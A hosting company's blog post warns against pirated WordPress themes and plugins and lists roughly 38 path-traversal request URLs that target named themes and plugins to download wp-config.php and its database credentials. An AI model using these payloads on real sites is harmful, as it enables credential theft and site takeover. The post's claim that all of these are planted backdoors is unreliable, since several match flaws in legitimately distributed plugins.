813-319-4253 | Client Area

Reason for avoiding pirated WordPress plugins and themes - they have hidden malware

The popularity of the WordPress website management system makes it a target for hackers, and millions of WordPress driven websites are hacked daily. However the problem is not the core WordPress system for it is very secure, it's the "free" pirated plugins that make the framework weak.

If you are serious about doing business online and you choose to use the popular WordPress website framework, it is best to pay for the secure plugins rather than seek pirated versions. Those "free" versions of normally paid software are generally injected with "backdoor" coding to allow someone easy entry to your hosting account.

This list shows how a hacker who distributes 'free' plugins and themes, attempts to locate his hidden malware and access a WordPress website admin, database or FTP.

These are URLs entered in the standard browser address bar. If the file is located at an unfortunate WordPress website, the wp-config.php file will provide the database username and password which can then be accessed remotely, and the hacker will add himself as an administrator. His next action is to login to the WordPress site, install an FTP plugin and gain full access to the hosting FTP zone.

Protect your website by using legitimately purchased WordPress software. If a fly-by-night webmaster is offering pirated free scripts which normally is sold by a hard working developer, just flip them the bird!


This list shows the hacker is checking a WordPress website to see if it uses his pirated themes in which he stored a file named download.php and it it's found, a query is sent to activate a process to download the wp-config.php file which will provide the database username and password.

  • /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
  • /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php
  • /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
  • /wp-content/themes/epic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
  • /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
  • /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php

In this list, the goal is the same, to get the wp-config.php file but the hacker now checks other plugins for known hidden backdoor files.

  • /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
  • /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
  • /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php
  • /wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php
  • /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php
  • /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
  • /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
  • /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
  • /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php
  • /wp-content/force-download.php?file=../wp-config.php
  • /wp-content/blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
  • /wp-admin/blog/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=showbiz_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
  • /wp-admin/admin-ajax.php?action=fe_get_sv_html&video=../wp-config.php
  • /wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
  • /wordpress/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php
  • /wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
  • /mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=../../../../wp-config.php
  • /index.php/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
  • /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php

 

Most likely these hacked files are published at hacker forums and being used by millions of 'dark web' users around the world, so attempts will be relentless.

Category: Website Tips |

Assisted Annual Hosting $83.40

  • CPanel Hosting ready immediately
  • WordPress or Joomla system installed and configured to suit your needs.

Included

  • Shopping Cart, Blog, Magazine, News, Video, Internet Radio, Church, Medical, Real Estate, Business Directory, Classifieds, Auto Trading etc
  • $20 Facebook marketing credit to immediately promote the website to over 10,000 viewers

Get Hosting Now

Service Expertise

WebsiteDons.com specializes in Joomla©™, WordPress©™ and Drupal©™ Content Management Systems which have all been award winning and most popular website operating systems. WebsiteDons.com is a one stop website services center for all your website solutions including unlimited web hosting, website design and development, search engine optimization and website search engine marketing. WebsiteDons.com have produced and supported over 4300 websites very efficiently and helped many clients achieve success online.

The single web hosting plan makes it simple for any small business to make the most of an online presence without muddling through numerous technical options which just leads to confusion.

WebsiteDons.com 813-319-4253 Owned and operated by Emuzement Net Inc.

Copyright © 2019 WebsiteDons.com. All Rights Reserved.